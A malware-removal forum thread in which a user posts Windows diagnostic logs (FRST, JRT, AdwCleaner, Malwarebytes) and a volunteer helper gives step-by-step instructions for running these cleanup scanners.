23-12-2015 02:12:31 Windows Update
23-12-2015 03:00:11 Windows Update
25-12-2015 21:52:17 JRT Pre-Junkware Removal
25-12-2015 21:52:35 ComboFix created restore point
25-12-2015 22:14:12 JRT Pre-Junkware Removal

==================== Faulty Device Manager Devices =============

Name: My Book Live Network Storage
Description: My Book Live Network Storage
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: Ethernet-kontroller
Description: Ethernet-kontroller
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Event log errors: =========================

Application errors:
==================
Error: (12/25/2015 10:10:50 PM) (Source: NvStreamSvc) (EventID: 2001) (User: )
Description: NvStreamSvcNvVAD initialization failed [6]

Error: (12/25/2015 10:10:50 PM) (Source: NvStreamSvc) (EventID: 2001) (User: )
Description: NvStreamSvcFailed to set NvVAD endpoint as default Audio endpoint [0]

Error: (12/25/2015 10:10:50 PM) (Source: NvStreamSvc) (EventID: 2001) (User: )
Description: NvStreamSvcNvVAD endpoint registration failed [0]

Error: (12/25/2015 09:49:27 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programmet AdwCleaner.exe versjon 5.0.2.6 sluttet å samhandle med Windows og ble lukket. Hvis du vil se om det finnes mer informasjon tilgjengelig om problemet, ser du i problemloggen i kontrollpanelet for Handlingssenter.

Prosess-ID: b64

Starttidspunkt: 01d13f556d372a67

Avslutningstidspunkt: 2

Programbane: C:\Users\Simon\Desktop\Malware\AdwCleaner.exe

Rapport-ID: f3f89292-ab48-11e5-94ca-a088696cbf14

Error: (12/25/2015 09:49:12 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programmet mbam.exe versjon 2.3.125.0 sluttet å samhandle med Windows og ble lukket. Hvis du vil se om det finnes mer informasjon tilgjengelig om problemet, ser du i problemloggen i kontrollpanelet for Handlingssenter.

Prosess-ID: 1754

Starttidspunkt: 01d13f559e1de315

Avslutningstidspunkt: 10

Programbane: C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe

Rapport-ID: f14612a6-ab48-11e5-94ca-a088696cbf14

Error: (12/25/2015 09:14:32 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Programnavn med feil: mbam.exe, versjon: 1.0.0.532, tidsangivelse: 0x53518532
Modulnavn med feil: MSVCR100.dll, versjon: 10.0.40219.325, tidsangivelse: 0x4df2be1e
Unntakskode: 0x40000015
Feilforskyvning: 0x0008d6fd
Feil prosess-ID: 0x180c
Feil starttid for program: 0xmbam.exe0
Feil programbane: mbam.exe1
Feil modulbane: mbam.exe2
Rapport-ID: mbam.exe3

Error: (12/25/2015 09:13:31 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Programnavn med feil: mbam.exe, versjon: 1.0.0.532, tidsangivelse: 0x53518532
Modulnavn med feil: MSVCR100.dll, versjon: 10.0.40219.325, tidsangivelse: 0x4df2be1e
Unntakskode: 0x40000015
Feilforskyvning: 0x0008d6fd
Feil prosess-ID: 0x7bc
Feil starttid for program: 0xmbam.exe0
Feil programbane: mbam.exe1
Feil modulbane: mbam.exe2
Rapport-ID: mbam.exe3

Error: (12/25/2015 09:09:50 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Programnavn med feil: rundll32.exe, versjon: 6.1.7600.16385, tidsangivelse: 0x4a5bc637
Modulnavn med feil: KERNELBASE.dll, versjon: 6.1.7601.19045, tidsangivelse: 0x56258f05
Unntakskode: 0xe06d7363
Feilforskyvning: 0x0000c42d
Feil prosess-ID: 0x1bf8
Feil starttid for program: 0xrundll32.exe0
Feil programbane: rundll32.exe1
Feil modulbane: rundll32.exe2
Rapport-ID: rundll32.exe3

Error: (12/25/2015 09:07:16 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Programnavn med feil: mbam.exe, versjon: 1.0.0.532, tidsangivelse: 0x53518532
Modulnavn med feil: MSVCR100.dll, versjon: 10.0.40219.325, tidsangivelse: 0x4df2be1e
Unntakskode: 0x40000015
Feilforskyvning: 0x0008d6fd
Feil prosess-ID: 0x19a4
Feil starttid for program: 0xmbam.exe0
Feil programbane: mbam.exe1
Feil modulbane: mbam.exe2
Rapport-ID: mbam.exe3

Error: (12/25/2015 09:04:59 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programmet Spotify.exe versjon 1.0.20.94 sluttet å samhandle med Windows og ble lukket. Hvis du vil se om det finnes mer informasjon tilgjengelig om problemet, ser du i problemloggen i kontrollpanelet for Handlingssenter.

Prosess-ID: aac

Starttidspunkt: 01d13f4d65b8c14d

Avslutningstidspunkt: 2

Programbane: C:\Users\Simon\AppData\Roaming\Spotify\Spotify.exe

Rapport-ID: c3b2fbbb-ab42-11e5-9458-a088696cbf14


System errors:
=============
Error: (12/25/2015 11:37:08 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT-MYNDIGHET)
Description: Det oppstod en feil under forsøk på lese den lokale vertsfilen.

Error: (12/25/2015 11:37:06 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT-MYNDIGHET)
Description: Det oppstod en feil under forsøk på lese den lokale vertsfilen.

Error: (12/25/2015 11:37:05 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT-MYNDIGHET)
Description: Det oppstod en feil under forsøk på lese den lokale vertsfilen.

Error: (12/25/2015 11:37:02 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT-MYNDIGHET)
Description: Det oppstod en feil under forsøk på lese den lokale vertsfilen.

Error: (12/25/2015 11:36:10 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Tjenesten Steam Client Service kan ikke starte på grunn av følgende feil: 
%%1053

Error: (12/25/2015 11:36:10 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Det oppstod et tidsavbrudd (30000 millisekunder) under venting på at tjenesten Steam Client Service skal koble til.

Error: (12/25/2015 11:34:32 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT-MYNDIGHET)
Description: Det oppstod en feil under forsøk på lese den lokale vertsfilen.

Error: (12/25/2015 11:33:22 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT-MYNDIGHET)
Description: Det oppstod en feil under forsøk på lese den lokale vertsfilen.

Error: (12/25/2015 11:33:20 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT-MYNDIGHET)
Description: Det oppstod en feil under forsøk på lese den lokale vertsfilen.

Error: (12/25/2015 11:33:20 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT-MYNDIGHET)
Description: Det oppstod en feil under forsøk på lese den lokale vertsfilen.


CodeIntegrity:
===================================
  Date: 2015-12-25 22:00:26.834
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2015-12-25 22:00:26.787
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.


==================== Memory info =========================== 

Processor: Intel(R) Core(TM) i7-4700HQ CPU @ 2.40GHz
Percentage of memory in use: 37%
Total physical RAM: 8112.24 MB
Available physical RAM: 5074.31 MB
Total Virtual: 16222.69 MB
Available Virtual: 13036.74 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:921.52 GB) (Free:370.2 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: (DriverCD) (Fixed) (Total:10 GB) (Free:5.19 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 8BE4CCEC)
Partition 1: (Active) - (Size=921.5 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=10 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================

Thank's for reading, hoping for some assistance as soon as possible! :bananas:



BC AdBot (Login to Remove)

 


#2 Machiavelli

Machiavelli

    Agent 007


  • Malware Response Instructor
  • 4,114 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:10:14 PM

Posted 26 December 2015 - 09:08 AM

Hello swaykeb00b, welcome to Bleeping Computer's Malware Removal forum!

 
My name is Gerrit. I will be assisting you with your malware-related problems.
If you would allow me to call you by your first name I would prefer that. smile.png
 
======================================================
 
Please read through the points below to ensure this process moves as quickly and efficiently as possible.

  • Ensure you read through my instructions thoroughly, and carry out each step in the order specified.
  • Please do not run any tools or take any steps other than those I provide for you. Independent efforts may make matters worse, and will affect my ability in providing the best set of instructions for you.
  • Please backup important files before proceeding with my instructions. Malware removal can be unpredictable at times.   
  • If you come across any issues whilst following my instructions, please stop and inform me of the issue in as much detail as possible. Please do not hesitate to ask before proceeding.
  • Topics are locked if no response is made after 4 days. Please inform me if you require additional time to complete my instructions.
  • I will notify you when I believe your computer is free of malware. Please bear in mind, absence of symptoms does not necessarily correlate to absence of malware, so please wait until the "All Clean". 
  • Ensure you are following this topic. Click etYzdbu.png at the top of the page. 

======================================================

 

STEP 1
E3feWj5.png Junkware Removal Tool (JRT)

  • Please download Junkware Removal Tool and save the file to your Desktop.
  • Temporarily disable your anti-virus software. For instructions, please refer to the following link.
  • Right-Click JRT.exe and select AVOiBNU.jpg Run as administrator to run the programme.
  • Follow the prompts and allow the scan to run uninterrupted. 
  • Upon completion, a log (JRT.txt) will open on your desktop.
  • Re-enable your anti-virus software.
  • Copy the contents of JRT.txt and paste in your next reply.
     

STEP 2

BY4dvz9.png AdwCleaner

  • Please download AdwCleaner and save the file to your Desktop.
  • Right-Click AdwCleaner.exe and select AVOiBNU.jpg Run as administrator to run the programme.
  • Follow the prompts. 
  • Click Scan
  • Upon completion, click Logfile. A log (AdwCleaner[S1].txt) will open. Briefly check the log for anything you know to be legitimate. 
  • Ensure anything you know to be legitimate does not have a checkmark under the corresponding tab, and click Cleaning
  • Follow the prompts and allow your computer to reboot
  • After the reboot, a log (AdwCleaner[C1].txt) will open. Copy the contents of the log and paste in your next reply.

-- File and folder backups are made for items removed using this tool. Should a legitimate file or folder be removed (otherwise known as a 'false-positive'), simple steps can be taken to restore the item. Please do not overly concern yourself with the contents of AdwCleaner[S1].txt.

 

STEP 3
GfiJrQ9.png Malwarebytes Anti-Malware (MBAM)

  • Open Malwarebytes Anti-Malware and click Update Now.
  • Once updated, click the Settings tab, followed by Detection and Protection and tick Scan for rootkits.
  • Click the Scan tab, ensure Threat Scan is selected and click Start Scan.
  • Note: You may see the following message, "Could not load DDA driver". Click Yes, allow your PC to reboot and continue afterwards. 
  • If threats are detected, click Remove Selected. If you are prompted to reboot, click Yes.
  • Upon completion of the scan (or after the reboot), click the History tab.
  • Click Application Logs and double-click the Scan Log.
  • Click Copy to Clipboard and paste the log in your next reply. 

STEP 4
xlK5Hdb.png Farbar Recovery Scan Tool (FRST) Scan

  • Right-Click FRST.exe or FRST64.exe and select AVOiBNU.jpg Run as administrator to run the programme.
  • Ensure the Addition.txt box is checked.
  • Click the Scan button and let the programme run.
  • Upon completion, click OK, then OK on the Addition.txt pop up screen.
  • Two logs (FRST.txt & Addition.txt) will now be open on your Desktop. Copy the contents of both logs and paste in your next reply. 

======================================================

STEP 5
pfNZP4A.png Logs
In your next reply please include the following logs. Please be sure to copy and paste the requested logs, as well as provide information on any questions I may have asked.

  • JRT.txt
  • AdwCleaner[C1].txt
  • MBAM Log
  • FRST.txt & Addition.txt

~Machiavelli

If I don't reply within 24 hours please PM me!

  • Every topic with no replies within 5 days will be closed.
  • If you like my help here please give me feedback.

unite_blue.png
 
 


#3 swaykeb00b

swaykeb00b
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:05:14 AM

Posted 26 December 2015 - 10:00 AM

The JRT log:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.1 (11.24.2015)
Operating System: Windows 7 Professional x64 
Ran by Simon (Administrator) on 26.12.2015 at 15:33:18,20
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 0 




Registry: 0 





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 26.12.2015 at 15:35:49,05
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The ADWCLEANER log:

# AdwCleaner v5.026 - Logfile created 26/12/2015 at 15:36:59
# Updated 21/12/2015 by Xplode
# Database : 2015-12-23.1 [Server]
# Operating system : Windows 7 Professional Service Pack 1 (x64)
# Username : Simon - SIMON-PC
# Running from : C:\Users\Simon\Desktop\Malware - Bleeping Computer\AdwCleaner.exe
# Option : Scan
# Support : http://toolslib.net/forum

***** [ Services ] *****


***** [ Folders ] *****


***** [ Files ] *****


***** [ DLL ] *****


***** [ Shortcuts ] *****


***** [ Scheduled tasks ] *****


***** [ Registry ] *****


***** [ Web browsers ] *****


########## EOF - C:\AdwCleaner\AdwCleaner[S5].txt - [610 bytes] ##########

The MBAM log:

Malwarebytes Anti-Malware
www.malwarebytes.org

Skannedato: 26.12.2015
Skannetid: 15:42
Loggfil: 
Administrator: Ja

Versjon: 2.2.0.1024
Malwaredatabase: v2015.12.26.02
Rootkitdatabase: v2015.12.26.01
Lisens: Gratis
Malwarebeskyttelse: Deaktivert
Ondsinnet Nettsidebeskyttelse: Deaktivert
Selvbeskyttelse: Deaktivert

OS: Windows 7 Service Pack 1
CPU: x64
Filsystem: NTFS
Bruker: Simon

Skannetype: Trusselskann
Resultat: Fullført
Objekter skannet: 364181
Tid brukt: 12 min, 13 sek

Minne: Aktivert
Oppstart: Aktivert
Filsystem: Aktivert
Arkiv: Aktivert
Rootkits: Aktivert
Heuristikk: Aktivert
PUP: Aktivert
PUM: Aktivert

Prosesser: 0
(Ingen ondsinnede elementer funnet)

Moduler: 0
(Ingen ondsinnede elementer funnet)

Registernøkler: 0
(Ingen ondsinnede elementer funnet)

Registerverdier: 0
(Ingen ondsinnede elementer funnet)

Registerdata: 0
(Ingen ondsinnede elementer funnet)

Mapper: 0
(Ingen ondsinnede elementer funnet)

Filer: 0
(Ingen ondsinnede elementer funnet)

Fysiske sektorer: 0
(Ingen ondsinnede elementer funnet)


(end)

FRST Log:

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:25-12-2015
Ran by Simon (administrator) on SIMON-PC (26-12-2015 15:57:38)
Running from C:\Users\Simon\Downloads
Loaded Profiles: Simon (Available Profiles: Simon)
Platform: Windows 7 Professional Service Pack 1 (X64) Language: Norsk, bokmål (Norge)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDService.exe
(Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(MSI) C:\Program Files (x86)\MSI\Fast Boot\FastBootService.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Qualcomm Atheros) C:\Program Files\Qualcomm Atheros\Network Manager\KillerService.exe
(Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\macromed\flash\FlashPlayerPlugin_20_0_0_235.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\macromed\flash\FlashPlayerPlugin_20_0_0_235.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2013-08-30] (Intel Corporation)
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [ETDCtrl] => C:\Program Files\Elantech\ETDCtrl.exe [2891568 2013-10-22] (ELAN Microelectronics Corp.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13667032 2014-01-20] (Realtek Semiconductor)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2585928 2015-01-16] (NVIDIA Corporation)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2013-12-20] (Intel Corporation)
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2694040 2014-07-22] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Fast Boot] => C:\Program Files (x86)\MSI\Fast Boot\StartFastBoot.exe [759120 2015-04-22] ()
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\...\Run: [Spotify Web Helper] => C:\Users\Simon\AppData\Roaming\Spotify\SpotifyWebHelper.exe [2346096 2015-12-25] (Spotify Ltd)
HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [7451928 2015-03-13] (Piriform Ltd)
HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\...\Run: [Gyazo] => C:\Program Files (x86)\Gyazo\GyStation.exe [3098424 2015-08-19] (Nota Inc.)
HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\...\Run: [Spotify] => C:\Users\Simon\AppData\Roaming\Spotify\Spotify.exe [8387696 2015-12-25] (Spotify Ltd)
HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3013712 2015-12-14] (Valve Corporation)
AppInit_DLLs: C:\Windows\System32\nvinitx.dll => C:\Windows\System32\nvinitx.dll [177624 2015-01-10] (NVIDIA Corporation)
AppInit_DLLs: ,C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [177624 2015-01-10] (NVIDIA Corporation)
AppInit_DLLs-x32: c:\Windows\SysWOW64\nvinit.dll => c:\Windows\SysWOW64\nvinit.dll [164568 2015-01-10] (NVIDIA Corporation)
AppInit_DLLs-x32:  C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [164568 2015-01-10] (NVIDIA Corporation)
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-07-16] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-07-16] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-07-16] ()
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  No File
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Killer Network Manager.lnk [2015-12-26]
ShortcutTarget: Killer Network Manager.lnk -> C:\Windows\Installer\{4692B750-DE88-4DCF-9163-745AF5604B24}\NetworkManager.exe_130C27D738F34C89BDDF21BCFD74B56D.exe (Flexera Software LLC)
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: Hosts file not detected in the default directory
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{4B93233A-B173-4539-92C3-0DD5545714B4}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkId=56626&homepage=hxxp://go.microsoft.com/fwlink/p/?LinkId=255141
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\Simon\AppData\Roaming\Mozilla\Firefox\Profiles\0n9rh6yz.default-1451081654131
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_20_0_0_235.dll [2015-12-25] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [No File]
FF Plugin: adobe.com/AdobeAAMDetect_x86_64 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2014-07-22] (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_235.dll [2015-12-25] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-07-25] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2014-07-25] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-25] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-25] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-07-23] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-05-01] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2014-07-22] (Adobe Systems)

Chrome: 
=======
CHR dev: Chrome dev build detected! <======= ATTENTION
CHR DefaultSearchURL: Default -> hxxps://duckduckgo.com/?q={searchTerms}
CHR DefaultSearchKeyword: Default -> duckduckgo.com
CHR DefaultSuggestURL: Default -> hxxps://ac.duckduckgo.com/ac/?q={searchTerms}&type=list
CHR Profile: C:\Users\Simon\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (gEotit4cheapier) - C:\Users\Simon\AppData\Local\Google\Chrome\User Data\Default\Extensions\aplmodepkfbkgbcilffogjhmecfclgmn [2015-01-28]
CHR Extension: (YouTube) - C:\Users\Simon\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-10-11]
CHR Extension: (Google Search) - C:\Users\Simon\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-01]
CHR Extension: (Gmail) - C:\Users\Simon\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-04-13]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2015-10-12]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2015-10-12] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2015-10-12] (Microsoft Corporation)
R2 ETDService; C:\Program Files\Elantech\ETDService.exe [101680 2013-10-15] (ELAN Microelectronics Corp.)
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1148744 2015-01-16] (NVIDIA Corporation)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-08-30] (Intel Corporation)
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [File not signed]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-09-16] (Intel Corporation)
